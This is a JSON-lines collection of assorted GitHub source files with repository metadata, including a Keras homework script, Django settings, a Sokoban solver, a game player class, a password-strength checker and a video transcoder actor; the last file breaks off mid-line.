+{"seq_id":"33294052778","text":"# -*- coding: utf-8 -*-\n# settings/heroku.py\nfrom .base import * # noqa\n\n# Parse database configuration from $DATABASE_URL\nimport dj_database_url\nDATABASES = {\n 'default': dj_database_url.config()\n}\n\n# Honor the 'X-Forwarded-Proto' header for request.is_secure()\nSECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')\n\n# debug\n# heroku config:add DJANGO_DEBUG=true\n# heroku config:remove DJANGO_DEBUG\nDEBUG = bool(os.environ.get('DJANGO_DEBUG', ''))\n","repo_name":"captnswing/freechess","sub_path":"freechess/settings/heroku.py","file_name":"heroku.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"1234651480","text":"import numpy as np\nimport pandas as pd\nfrom pandas import DataFrame\nfrom sklearn import preprocessing\nfrom keras import optimizers\nimport matplotlib.pyplot as plt\nfrom keras.utils import np_utils\nfrom keras.datasets import mnist\nfrom keras.models import Sequential\nfrom keras.layers import Dense,Dropout,Flatten,Conv2D,MaxPooling2D\nimport csv\n\n\n\nTrain_fpath='data/train.csv'\nExam_fpath='data/test.csv'\nOutputFileName = \"ex.csv\"\nthreshold=0.5\nBatchsize =500\nEpochs =1\nlr =0.0001\nFeatureCount = 13\n\ndef ExamDataPreprocessing (ExamData):\n ExamData['workclass']=ExamData['workclass'].replace(' ?',' Private')\n ExamData['workclass'].fillna('Private')\n ExamData['workclass'].replace(np.nan, 'Private', inplace=True)\n ExamData['workclass'].replace(np.inf, 'Private', inplace=True)\n ExamData['marital_status'].fillna(0)\n ExamData['marital_status'].replace(np.nan, '0', inplace=True)\n ExamData['marital_status'].replace(np.inf, '0', inplace=True)\n \n colnums =pd.Series(['workclass','education','marital_status','occupation','relationship','race','sex','native_country'])\n ExamData =DataAllDecode(ExamData,colnums)\n\n\n #ExamData.drop(['fnlwgt'],axis =1)\n \n\n ndarray =ExamData.values\n\n Features=ndarray[:,0:FeatureCount]\n \n minmax_scale = preprocessing.MinMaxScaler(feature_range=(0, 1))\n scaledFeatures=minmax_scale.fit_transform(Features)\n print(scaledFeatures)\n return scaledFeatures\n\n\ndef ReadFile (TrainPath,TestPath):\n Train =pd.read_csv (TrainPath)\n Test =pd.read_csv (TestPath)\n return Train,Test\n\ndef DataDecode (Data):\n Items =Data.drop_duplicates()\n index = 0\n for item in Items:\n Data.replace(item, index, inplace=True)\n index=index+1\n Data=Data.astype(int)\n return Data\n\ndef DataAllDecode (Data,colums):\n for index in colums:\n Data[index]=DataDecode(Data[index])\n return Data\ndef TrainDataPreprocessing(Data):\n\n Data['workclass']=Data['workclass'].replace(' ?',' Private')\n Data['workclass'].fillna('Private')\n Data['workclass'].replace(np.nan, 'Private', inplace=True)\n Data['workclass'].replace(np.inf, 'Private', inplace=True)\n Data['marital_status'].fillna(0)\n Data['marital_status'].replace(np.nan, '0', inplace=True)\n Data['marital_status'].replace(np.inf, '0', inplace=True)\n colnums =pd.Series(['workclass','education','marital_status','occupation','relationship','race','sex','native_country','income'])\n Data =DataAllDecode(Data,colnums)\n \n \n #Data.to_csv(\"CleanData.csv\")\n #Data.drop(['fnlwgt'],axis =1)\n x_OneHot_df = pd.get_dummies(data=Data,columns=[\"income\"])\n \n\n ndarray =x_OneHot_df.values\n Label =ndarray[:,14] \n Features=ndarray[:,0:FeatureCount]\n \n minmax_scale = preprocessing.MinMaxScaler(feature_range=(0, 1))\n scaledFeatures=minmax_scale.fit_transform(Features)\n print(scaledFeatures)\n return scaledFeatures,Label\n\n \ndef show_train_history(train_history,train,validation):\n plt.plot(train_history.history[train])\n plt.plot(train_history.history[validation])\n plt.title(\"Train History\")\n plt.ylabel(train)\n plt.xlabel('Epoch')\n plt.legend(['train','validation'],loc='upper left')\n plt.show()\n\ndef WriteOutputFile (AllProbability):\n \n with open(OutputFileName, 'w', newline='') as csvfile:\n \n writer = csv.writer(csvfile)\n \n \n writer.writerow(['id', 'label'])\n for i in range (0,len(AllProbability)):\n code= 1\n if(AllProbability[i] >threshold):\n code=0\n writer.writerow([i+1, code])\n print(\"Output file\",OutputFileName)\n \nif __name__=='__main__':\n \n \n TrainData ,ExamData =ReadFile(Train_fpath,Exam_fpath)\n \n ExamDataFeatures =ExamDataPreprocessing(ExamData)\n msk =np.random.rand(len(TrainData))<0.8\n train_data = TrainData[msk]\n test_data = TrainData[~msk]\n TrainFeatrue,TrainLabel = TrainDataPreprocessing(train_data)\n TestFeature,TestLabel =TrainDataPreprocessing(test_data)\n print(ExamDataFeatures[:2])\n model=Sequential()\n model.add(Dense(units =30,input_dim=FeatureCount,kernel_initializer='uniform',activation ='relu'))\n model.add(Dense(units =20,kernel_initializer='uniform',activation ='relu'))\n model.add(Dense(units =15,kernel_initializer='uniform',activation ='relu'))\n model.add(Dense(units =1,kernel_initializer='uniform',activation ='sigmoid'))\n sgd = optimizers.SGD(lr=lr, decay=1e-6, momentum=0.9, nesterov=True)\n adam=optimizers.Adam (lr=lr, beta_1=0.9, beta_2=0.999, epsilon=None, decay=1e-6, amsgrad=False)\n model.compile (loss='binary_crossentropy',\n optimizer=adam,metrics =['accuracy'])\n\n \n train_history =model.fit (x=TrainFeatrue,y=TrainLabel,\n validation_split=0.2,epochs=Epochs,\n batch_size =Batchsize,verbose =2)\n\n show_train_history(train_history,'acc','val_acc')\n show_train_history(train_history,'loss','val_loss')\n scores =model.evaluate (x =TestFeature,y =TestLabel)\n print(scores[1])\n\n all_probability=model.predict (ExamDataFeatures)\n \n print(all_probability,len(all_probability))\n \n WriteOutputFile(all_probability)\n \n\n\n \n \n","repo_name":"mick60316/AI_Class_HW02","sub_path":"HW2.py","file_name":"HW2.py","file_ext":"py","file_size_in_byte":5249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"71557308899","text":"import logging\n\n\ndef indices(string, char):\n \"\"\"\n Return the indices of the given character in the given string.\n Return an empty list if the character cannot be found.\n \"\"\"\n return [i for i, c in enumerate(string) if c == char]\n\n\ndef substitute(command_list, dictionary, drop=False, drop_line=True):\n \"\"\"\n Replace markup in the command_list which matches a key in the dictionary with the\n value of that key in the dictionary. Empty values leave the item unchanged.\n Markup needs to be safe to use in the final command as there is no guarantee that\n any dictionary will replace all markup in the command_list.\n arguments: command_list - a list of strings\n dictionary - a dictionary of keys which match some of the strings with values\n to replace for the key in the string.\n drop - drop the value if a key is present but the value is None/empty\n drop_line - drop the entire command if a key is present but the value is None/empty\n \"\"\"\n parsed = []\n for line in command_list:\n for key, value in dictionary.items():\n if value:\n line = line.replace(key, value)\n elif drop and key in line:\n # If drop_line is activated or Value=None, remove the entire line\n if drop_line or value is None:\n line = None\n break\n # Otherwise, replace just the key by nothing\n else:\n line = line.replace(key, value)\n if line is not None:\n parsed.append(line)\n return parsed\n\n\ndef seconds_to_str(time):\n hours, remainder = divmod(int(round(time)), 3600)\n minutes, seconds = divmod(remainder, 60)\n return \"%02d:%02d:%02d\" % (hours, minutes, seconds)\n\n\ndef safe_dict_format(string, dictionary):\n \"\"\"\n Used to replace value in string using dictionary\n eg : '{foo}{bar}.safe_dict_format({'foo' : 'hello'})\n >>> 'hello{bar}'\n \"\"\"\n\n class SafeDict(dict):\n def __missing__(self, key):\n logger = logging.getLogger(\"lava-dispatcher\")\n logger.warning(\"Missing key : '{%s}' for string '%s'\", key, string)\n return \"{\" + key + \"}\"\n\n return string.format_map(SafeDict(dictionary))\n\n\ndef map_kernel_uboot(kernel_type, device_params=None):\n \"\"\"\n Support conversion of kernels only if the device cannot\n handle what has been given by the test job writer.\n\n Decide based on the presence of suitable load addresses.\n If deploy gets a kernel type for which there is no matching boot kernel address\n then if a bootm address exists do the conversion.\n bootm is the last resort.\n \"\"\"\n bootcommand = \"bootm\"\n logger = logging.getLogger(\"lava-dispatcher\")\n if kernel_type == \"uimage\":\n return bootcommand\n elif kernel_type == \"zimage\":\n if device_params and \"bootz\" in device_params:\n bootcommand = \"bootz\"\n else:\n logger.warning(\n \"No bootz parameters available, falling back to bootm and converting zImage\"\n )\n elif kernel_type == \"image\":\n if device_params and \"booti\" in device_params:\n bootcommand = \"booti\"\n else:\n logger.warning(\n \"No booti parameters available, falling back to bootm and converting zImage\"\n )\n return bootcommand\n","repo_name":"Linaro/lava","sub_path":"lava_dispatcher/utils/strings.py","file_name":"strings.py","file_ext":"py","file_size_in_byte":3422,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"34"} +{"seq_id":"37961886044","text":"import math\nfrom random import *\nfrom external_info import *\n\nclass Player:\n def __init__(self):\n self.firstname = fn[randint(0, len(fn)-1)]\n self.lastname = ln[randint(0, len(ln)-1)]\n self.style = styles[randint(0,5)]\n determine_starting_stats(self, self.style)\n self.potential = curved_potential()\n self.pow += math.floor(random()/10*6*self.potential)\n self.int += math.floor(random()/10*6*self.potential)\n self.sze += math.floor(random()/10*6*self.potential)\n self.spd += math.floor(random()/10*6*self.potential)\n self.acc += math.floor(random()/10*6*self.potential)\n self.exp += math.floor(random()/10*6*self.potential)\n self.blc += math.floor(random()/10*6*self.potential)\n self.end += math.floor(random()/10*6*self.potential)\n self.trait = determine_trait(self.style, self.potential)\n if self.trait[0] == \"Giant\":\n self.sze += 10\n if self.sze > 99:\n self.sze = 99\n self.GS = (self.pow + self.acc + self.exp)/3\n self.PM = (self.int + self.acc + self.blc)/3\n self.SW = (self.spd + self.exp + self.end)/3\n self.DF = (self.sze + self.blc + self.end)/3\n self.overall = round((self.GS + self.PM + self.SW + self.DF)/4)\n self.GS = round(self.GS)\n self.PM = round(self.PM)\n self.SW = round(self.SW)\n self.DF = round(self.DF)\n \n self.growth_style = \"Development\"\n self.age = 20\n self.injury = round(randint(6, 9)+random(), 1)\n self.team = None\n self.contract = [None, None]\n\n def age_player(self):\n self.age += 1\n if self.age == 30:\n #retire\n print(\"Retire\")\n \n if self.growth_style == \"Development\":\n nums = []\n for i in range(7):\n nums.append(math.ceil(random()*(self.potential)/2))\n if self.trait[0] == \"Prodigy\":\n nums[i] += 1\n if self.trait[0] == \"Stunted\":\n a = randint(1,3)\n if a == 3:\n nums[i] -= 1\n if self.age >= 24:\n rand = randint(1, 100)\n if self.age == 24 and rand >= 86 or self.age == 25 and rand >=41 or self.age == 26:\n self.growth_style = \"Prime\"\n self.injury -= randint(1, 20)/10\n elif self.growth_style == \"Prime\":\n nums = []\n for i in range(7):\n num = randint(1, 11)-self.potential\n if num <= 0:\n nums.append(math.ceil(random()*(self.potential)/3))\n else:\n nums.append(-1*math.ceil(random()*(3-(self.potential/4))))\n if self.age >= 26:\n rand = randint(1, 100)\n if self.age == 26 and rand >= 86 or self.age == 27 and rand >=41 or self.age == 28:\n self.growth_style = \"Veteran\"\n self.injury -= randint(-15, 15)/10\n else:\n #VETERAN\n nums = []\n for i in range(7):\n nums.append(-1*math.ceil(random()*(6-(self.potential/2))))\n if self.trait[0] == \"Dedicated\" and nums[i] < 0:\n nums[i] += 1\n if self.trait[0] == \"Short-Lived\":\n nums[i] -= 2\n self.injury -= randint(-20, -1)/10\n\n if self.trait[0]==\"Superstar\":\n for i in range(len(nums)):\n if nums[i] < 1:\n nums[i] += 2\n else:\n nums[i] += 1\n\n if self.trait[0]==\"Consistent\":\n for i in range(len(nums)):\n if nums[i] < -2:\n nums[i] += 1\n elif nums[i] > 3:\n nums[i] -= 1\n\n if self.trait[0]==\"Wildcard\":\n for i in range(len(nums)):\n nums[i] += randint(-2, 2)\n \n\n if self.style == \"Attacker\":\n self.pow += (nums[0]+randint(0, 3))\n self.int += (nums[1]+randint(0, 3))\n self.spd += (nums[2]+randint(-1, 1))\n self.acc += (nums[3]+randint(0, 4))\n self.exp += (nums[4]+randint(-1, 2))\n self.blc += (nums[5]+randint(-1, 2))\n self.end += (nums[6]+randint(-2, 1))\n elif self.style == \"Finisher\":\n self.pow += (nums[0]+randint(0, 3))\n self.int += (nums[1]+randint(-1, 1))\n self.spd += (nums[2]+randint(0, 3))\n self.acc += (nums[3]+randint(-1, 2))\n self.exp += (nums[4]+randint(0, 4))\n self.blc += (nums[5]+randint(-2, 1))\n self.end += (nums[6]+randint(-1, 2))\n elif self.style == \"Two-Way\":\n self.pow += (nums[0]+randint(0, 3))\n self.int += (nums[1]+randint(-1, 1))\n self.spd += (nums[2]+randint(-1, 1))\n self.acc += (nums[3]+randint(-1, 2))\n self.exp += (nums[4]+randint(-1, 2))\n self.blc += (nums[5]+randint(-1, 3))\n self.end += (nums[6]+randint(-1, 3))\n elif self.style == \"Playmaker\":\n self.pow += (nums[0]+randint(-1, 1))\n self.int += (nums[1]+randint(0, 3))\n self.spd += (nums[2]+randint(0, 3))\n self.acc += (nums[3]+randint(-1, 2))\n self.exp += (nums[4]+randint(-1, 2))\n self.blc += (nums[5]+randint(-1, 2))\n self.end += (nums[6]+randint(-1, 2))\n elif self.style == \"Distributor\":\n self.pow += (nums[0]+randint(-1, 1))\n self.int += (nums[1]+randint(0, 3))\n self.spd += (nums[2]+randint(-1, 1))\n self.acc += (nums[3]+randint(-1, 2))\n self.exp += (nums[4]+randint(-2, 1))\n self.blc += (nums[5]+randint(0, 5))\n self.end += (nums[6]+randint(-1, 3))\n else:\n self.pow += (nums[0]+randint(-1, 1))\n self.int += (nums[1]+randint(-1, 1))\n self.spd += (nums[2]+randint(0, 3))\n self.acc += (nums[3]+randint(-2, 1))\n self.exp += (nums[4]+randint(-1, 2))\n self.blc += (nums[5]+randint(-1, 3))\n self.end += (nums[6]+randint(0, 5))\n\n if self.trait[0] == \"Scared\":\n self.blc -= 1\n self.end -= 1\n if self.trait[0] == \"Speedster\":\n self.spd += 3\n self.exp += 1\n self.blc -= 1\n if self.trait[0] == \"Sniper\":\n self.pow += 1\n self.acc += 1\n self.exp += 1\n if self.trait[0] == \"Dead Weight\":\n self.spd -= 1\n self.exp -= 1\n self.end -= 1\n if self.trait[0] == \"Hardened\":\n self.end += 1\n self.int += 1\n self.injury -= 0.5\n if self.trait[0] == \"Genius\":\n self.int += 2\n self.acc += 1\n self.blc += 1\n if self.trait[0] == \"Pass-First\":\n self.int += 2\n self.blc += 1\n self.pow -= 1\n if self.trait[0] == \"Whimp\":\n self.pow -= 1\n self.acc -= 1\n self.exp -= 1\n if self.trait[0] == \"Giant\":\n self.blc += 1\n self.end += 1\n if self.trait[0] == \"Agile\":\n self.injury += 0.5\n self.spd += 1\n self.exp += 1\n if self.trait[0] == \"Fish-Like\":\n self.spd += 1\n self.exp += 1\n self.end += 1\n if self.trait[0] == \"Selfish\":\n self.pow += 2\n self.exp += 1\n self.int -= 1\n if self.trait[0] == \"Dumb\":\n self.int -= 1\n self.acc -= 1\n self.blc -= 1\n if self.trait[0] == \"Brick Wall\":\n self.blc += 2\n self.end += 1\n self.spd -= 1\n if self.trait[0] == \"Hard Worker\":\n self.acc += 1\n self.blc += 1\n\n if self.pow > 99:\n self.pow = 99\n if self.int > 99:\n self.int = 99\n if self.spd > 99:\n self.spd = 99\n if self.acc > 99:\n self.acc = 99\n if self.exp > 99:\n self.exp = 99\n if self.blc > 99:\n self.blc = 99\n if self.end > 99:\n self.end = 99\n \n self.GS = (self.pow + self.acc + self.exp)/3\n self.PM = (self.int + self.acc + self.blc)/3\n self.SW = (self.spd + self.exp + self.end)/3\n self.DF = (self.sze + self.blc + self.end)/3\n self.overall = round((self.GS + self.PM + self.SW + self.DF)/4)\n self.GS = round(self.GS)\n self.PM = round(self.PM)\n self.SW = round(self.SW)\n self.DF = round(self.DF)\n self.injury = round(self.injury, 1)\n if self.injury <= 0.1:\n self.injury == 0.1\n\n def __str__(self):\n #return \"{0} {1}, Age: {2}, Style: {3}, Trait: {4}, {5} Star Potential, {6}, \\nStats(GS {7}, PM {8}, SW {9}, DF {10}, {11}) Injury: {12}\".format(self.firstname, self.lastname, self.age, self.style, self.trait[0], self.potential, self.team, self.GS, self.PM, self.SW, self.DF, self.overall, self.injury)\n return \"Age: {0}, GS {1}; PM {2}; SW {3}; DF {4}; Overall {5}; Potential {6}; STYLE - {7}; TRAIT - {8} ; \".format(self.age, self.GS, self.PM, self.SW, self.DF, self.overall, self.potential, self.style, self.trait[0])","repo_name":"ItsMeToast/ProjectPoolball","sub_path":"src/scripts/player_class.py","file_name":"player_class.py","file_ext":"py","file_size_in_byte":9376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"5210654407","text":"'''\n\n'''\n\nimport sys\n\ndef ship_class(c):\n if c == 'B' or c == 'b':\n return 'BattleShip'\n elif c == 'C' or c == 'c':\n return 'Cruiser'\n elif c == 'D' or c == 'd':\n return 'Destroyer'\n elif c == 'F' or c == 'f':\n return 'Frigate'\n else:\n return 'Error'\n\nt = int(input())\nfor i in range(t):\n c = input()\n print(ship_class(c))","repo_name":"Harish-Muralidhar/Benchmark_Test_To_Analyze_Performance_Of_Code_Generating_Foundation_Models","sub_path":"generated_codes/experiment_c/parameter_set_2/single_sample/python_files/28.py","file_name":"28.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"30888431514","text":"import sys\nimport pygame\nimport math\nfrom pygame.locals import *\n\ndef main():\n (x,y) = (500,500) \n deg = 0 \n pygame.init() \n pygame.display.set_mode((x, y), 0, 32) \n screen = pygame.display.get_surface()\n\n while (1):\n pygame.draw.rect(screen, (0, 200, 0), (0,0,int(x/2),int(y/2)))\n pygame.draw.line(screen, (0, 200, 0), (0, y/2), (x, int(y/2)))\n pygame.draw.line(screen, (0, 200, 0), (int(x/2), 0), (int(x/2), y))\n for i in range(1, 30):\n dx = x/2 + x/2 * math.cos(math.radians(deg-i))\n dy = y/2 + x/2 * math.sin(math.radians(deg-i))\n pygame.draw.aaline(screen, (0, 255/i, 0), (int(x/2), int(y/2)), (int(dx), int(dy)),5)\n\n pygame.display.update() \n pygame.time.wait(30) \n screen.fill((0, 20, 0, 0)) \n\n for event in pygame.event.get():\n if event.type == QUIT: \n pygame.quit() \n sys.exit()\nif __name__ == \"__main__\":\n main()","repo_name":"biorobaw/robotito","sub_path":"V3/Code/robotito/drawMap.py","file_name":"drawMap.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"70275796257","text":"#Aim : Program to multiply two entered integer values.\n#Developer: Rakesh yadav\n\n\nx = float (input(\"Enter 1st number: \"))\ny = float (input(\"Enter 2nd number: \"))\n\n# logic for multiplying two numbers\nz = x * y\nprint(\"Multiply of %.2f and %.2f is : %.2f\" %(x , y , z))\n\n\n","repo_name":"gfobiyatechnical/2k19-With-Python-","sub_path":"Getting started With Python 3._/Lab/que5.py","file_name":"que5.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"42974084992","text":"# -*- coding: utf-8 -*-\n# UTF-8 encoding when using korean\nuser_input = 'adfkdncjdk'\nanswer = 0\nif len(user_input) >= 10:\n answer += 1\n\nbanbok = [False, False, False, False] # 소문자, 대문자, 숫자, 특수문자\n\nasc_list = []\nfor i in user_input:\n asc_list.append(ord(i))\nprint(asc_list)\n\nfor j in asc_list:\n if banbok[3] == False:\n if 33 <= j <= 47 or 58 <= j <= 64 or 91 <= j <= 96 or 123 <= j <= 125: # 특수문자\n banbok[3] = True\n\n if banbok[0] == False:\n if 97 <= j <= 122:\n banbok[0] = True\n if banbok[1] == False:\n if 65 <= j <= 90:\n banbok[1] = True\n if banbok[2] == False:\n if 48 <= j <= 57:\n banbok[2] = True\n\nanswer = answer + banbok.count(True)\nprint(banbok)\nprint('LEVEL' + str(answer))","repo_name":"AhnDogeon/algorithm_study","sub_path":"line/엔터프라이즈1.py","file_name":"엔터프라이즈1.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"41430885704","text":"import itertools\nfrom typing import TextIO, List, Tuple\n\nimport networkx as nx\nfrom PIL import Image\n\nfrom Base import Base, AbstractFilenameProvider\nfrom common.python import images\nfrom common.python.tuples import add_tuple\n\n\ndef load_map(fd: TextIO) -> List[List[str]]:\n return [list(l.strip()) for l in fd if l]\n\n\ndef fac_frac(n, k=None):\n if k is None:\n k = n\n m = 1\n for i in range(n - k + 1, n + 1):\n m *= i\n return m\n\n\ndef get_cell(loc, plane, idx_to_cell, guy_location, crate_locations):\n y, x = loc\n if plane[y][x] == '#':\n return '#'\n if (y, x) == guy_location:\n return 's'\n if (y, x) in (idx_to_cell[i] for i in crate_locations):\n return 'c'\n return ' '\n\n\ndef set_remove_add(tup: Tuple, rem, add):\n assert rem in tup\n x = set(tup)\n x.remove(rem)\n x.add(add)\n return tuple(sorted(x))\n\n\ndef generate_graph(plane: List[List[str]]):\n idx_to_cell = []\n cell_to_idx = {}\n crates = sum(cell == 'c' for row in plane for cell in row)\n for y in range(len(plane)):\n for x in range(len(plane[y])):\n if plane[y][x] != '#':\n cell_to_idx[(y, x)] = len(idx_to_cell)\n idx_to_cell.append((y, x))\n\n g = nx.DiGraph()\n for guy_location in range(len(idx_to_cell)):\n for crate_locations in itertools.combinations(set(range(len(idx_to_cell))).difference({guy_location}), crates):\n node = (guy_location, tuple(crate_locations))\n g.add_node(node)\n for move in [(1, 0), (-1, 0), (0, 1), (0, -1)]:\n new_guy = move[0] + idx_to_cell[guy_location][0], move[1] + idx_to_cell[guy_location][1]\n next_over = get_cell(new_guy, plane, idx_to_cell, guy_location, crate_locations)\n if next_over == ' ':\n g.add_edge(node, (cell_to_idx[new_guy], tuple(crate_locations)))\n if next_over == 'c':\n next_crate = move[0] + new_guy[0], move[1] + new_guy[1]\n two_over = get_cell(next_crate, plane, idx_to_cell, guy_location, crate_locations)\n if two_over == ' ':\n crate_idx = cell_to_idx[new_guy]\n new_crate_idx = cell_to_idx[next_crate]\n new_node = cell_to_idx[new_guy], set_remove_add(crate_locations, crate_idx, new_crate_idx)\n assert new_node[0] not in new_node[1]\n g.add_edge(node, new_node)\n\n return g, idx_to_cell, cell_to_idx\n\n\ndef get_start_state(plane, cell_to_idx):\n guy_loc = None\n crate_locs = []\n\n for y in range(len(plane)):\n for x in range(len(plane[y])):\n if plane[y][x] == 's':\n guy_loc = cell_to_idx[(y, x)]\n if plane[y][x] == 'c':\n crate_locs.append(cell_to_idx[(y, x)])\n return guy_loc, tuple(crate_locs)\n\n\ndef get_end_states(plane, cell_to_idx):\n crate_locs = []\n for y in range(len(plane)):\n for x in range(len(plane[y])):\n if plane[y][x] == 'x':\n crate_locs.append(cell_to_idx[(y, x)])\n\n for guy in set(range(len(cell_to_idx))).difference(crate_locs):\n yield guy, tuple(crate_locs)\n\n\ndef coords_to_moves(coords):\n moves = []\n for a, b in zip(coords[:-1], coords[1:]):\n d = b[0] - a[0], b[1] - a[1]\n if d == (1, 0):\n moves.append('DOWN')\n elif d == (-1, 0):\n moves.append('UP')\n elif d == (0, 1):\n moves.append('RIGHT')\n elif d == (0, -1):\n moves.append('LEFT')\n else:\n raise AssertionError\n return moves\n\n\ndef solve_sokoban(fn):\n with open(fn) as fd:\n plane = load_map(fd)\n\n empty = sum(cell != '#' for row in plane for cell in row)\n crates = sum(cell == 'c' for row in plane for cell in row)\n states = fac_frac(empty, crates + 1) // fac_frac(crates)\n\n g, idx_to_cell, cell_to_idx = generate_graph(plane)\n\n start = get_start_state(plane, cell_to_idx)\n ends = list(get_end_states(plane, cell_to_idx))\n\n shortest = states,\n for end in ends:\n p = nx.shortest_path(g, start, end)\n shortest = min(shortest, (len(p), p))\n\n return coords_to_moves([idx_to_cell[x] for x, _ in shortest[1]])\n\n\nRESOURCES = {\n ' ': Image.open('../resources/w12/tile_empty.png'),\n 'x': Image.open('../resources/w12/tile_goal.png'),\n '#': Image.open('../resources/w12/tile_wall.png'),\n\n 'c': Image.open('../resources/w12/tile_crate.png'),\n 's': Image.open('../resources/w12/tile_sokoban.png'),\n\n}\n\n\ndef draw_state(game, crates, sokoban, tile_size=32):\n frame = Image.new('RGBA', (len(game) * tile_size, len(game[0]) * tile_size, ), color=(0, 0, 0, 255))\n for ridx, row in enumerate(game):\n for cidx, cell in enumerate(row):\n frame.paste(RESOURCES[cell],\n (tile_size * ridx, tile_size * cidx, tile_size * (ridx + 1), tile_size * (cidx + 1)))\n for crate in crates:\n frame.paste(RESOURCES['c'],\n ((tile_size * crate[0], tile_size * crate[1], tile_size * (crate[0] + 1),\n tile_size * (crate[1] + 1))),\n mask=RESOURCES['c'])\n frame.paste(RESOURCES['s'],\n ((tile_size * sokoban[0], tile_size * sokoban[1], tile_size * (sokoban[0] + 1),\n tile_size * (sokoban[1] + 1))),\n mask=RESOURCES['s'])\n return frame\n\n\ndef animate_sokoban(fn, out_fn):\n moves = solve_sokoban(fn)\n with open(fn, 'r') as fd:\n game = load_map(fd)\n crates = set()\n sokoban = None\n for ridx, row in enumerate(game):\n for cidx, cell in enumerate(row):\n if cell == 'c':\n row[cidx] = ' '\n crates.add((ridx, cidx))\n elif cell == 's':\n row[cidx] = ' '\n sokoban = (ridx, cidx)\n frames = [draw_state(game, crates, sokoban)]\n for move in moves:\n delta = {'UP': (-1, 0), 'DOWN': (1, 0), 'LEFT': (0, -1), 'RIGHT': (0, 1)}[move]\n sokoban = add_tuple(sokoban, delta)\n if sokoban in crates:\n crates.remove(sokoban)\n crates.add(add_tuple(sokoban, delta))\n frames.append(draw_state(game, crates, sokoban))\n images.save_gif(frames, out_fn, duration=500)\n\n\nclass PartB(Base):\n name = 'B'\n\n def run(self, fnprovider: AbstractFilenameProvider):\n \"\"\"Sokoban. Prevzaté z https://www.umimematiku.cz\"\"\"\n animate_sokoban('../resources/w12/sokoban1.txt', fnprovider.get_filename('.gif', 'simple', \"Simple\"))\n animate_sokoban('../resources/w12/sokoban2.txt', fnprovider.get_filename('.gif', 'hard', 'Hard'))\n animate_sokoban('../resources/w12/sokoban3.txt', fnprovider.get_filename('.gif', 'slides', 'Slides'))\n return fnprovider.format_files()\n","repo_name":"jksdf/IV122","sub_path":"src/week12/PartB.py","file_name":"PartB.py","file_ext":"py","file_size_in_byte":6849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"74145102498","text":"import os\nimport json\nimport numpy as np\nfrom sklearn.linear_model import LogisticRegression\n\n\ndef save_lr_to_file(lr, dirname):\n with open(os.path.join(dirname, 'lr.json'), 'w') as lr_file:\n json.dump({\n 'init_params': lr.get_params(),\n 'model_params': {\n p:getattr(lr, p).tolist() for p in ('coef_', 'intercept_','classes_', 'n_iter_')\n }\n },\n lr_file,\n indent = 4)\n\nx = np.arange(10).reshape(-1, 1)\ny = np.array([0, 1, 0, 0, 1, 1, 1, 1, 1, 1])\n\nmodel = LogisticRegression(solver='liblinear', C=10.0, random_state=0)\nmodel.fit(x, y)\np_pred = model.predict_proba(x)\nprint(p_pred)\nsave_lr_to_file(model, './')","repo_name":"fredrikluo/mlserving","sub_path":"pkg/scikitlearn/test_data/test_data_gen.py","file_name":"test_data_gen.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"26492767070","text":"from thespian.actors import ActorTypeDispatcher\nimport os\nimport subprocess\nfrom datetime import timedelta\nimport re\nfrom ..models import JobState, TranscodeJob\nfrom . import messages as m\nimport logging\n\n\nclass Transcoder(ActorTypeDispatcher):\n def __init__(self):\n super(Transcoder, self).__init__()\n self.manager = None\n self.job_queue = None\n self.job = None\n self.command = 'HandBrakeCLI -i {0} -o {1} --preset = \"High Profile\" --subtitle scan -F'\n self.process = None\n self.progress_regex = re.compile('Encoding:.* (?P\\d{0,2})(.\\d{2} %)')\n self.progress = 0\n\n @staticmethod\n def actorSystemCapabilityCheck(capabilities, requirements):\n res = True\n res = res and capabilities['HostName'] == requirements['HostName']\n return res\n\n def receiveMsg_InitTranscoder(self, message, sender):\n logging.info('Starting Transcode of {0}'.format(message.job.relative_file))\n self.job = message.job\n self.manager = sender\n self.job_queue = message.job_queue\n\n folder = os.path.split(self.job.output_file)[0]\n if not os.path.exists(folder):\n os.makedirs(folder)\n folder = os.path.split(self.job.output_file)[0]\n\n command = ['HandBrakeCLI',\n '-i',\n self.job.input_file,\n '-o',\n self.job.output_file,\n '--preset=High Profile',\n '--subtitle',\n 'scan',\n '-F']\n\n self.process = subprocess.Popen(command,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n\n self.wakeupAfter(timedelta(seconds=0.1))\n\n def receiveMsg_WakeupMessage(self, message, sender):\n # Pull a line off stdout searching for carriage return\n # HandBrakeCLI overwrites the same line repeatedly\n # logging.debug('Reading next line from Handbrake.')\n line = ''\n while line[-1:] != '\\r' and self.process.poll() is None:\n line = line + bytes.decode(self.process.stdout.read(1))\n\n progress = self._find_transcode_progress(line)\n if progress != self.progress:\n self.progress = progress\n self.send(self.job_queue, m.UpdateTranscodeJob(job_id=self.job.id,\n state=JobState.TRANSCODING,\n progress=progress))\n\n if self.process.poll() is not None:\n logging.debug('Transcoder completed with return code %s', self.process.poll())\n self.send(self.manager, m.FileTranscodeComplete(self.process.poll()))\n else:\n self.wakeupAfter(timedelta(seconds=0.1))\n\n def _find_transcode_progress(self, line):\n result = self.progress_regex.match(line)\n progress = None\n if result is not None:\n progress = result.groupdict().get('progress', None)\n return 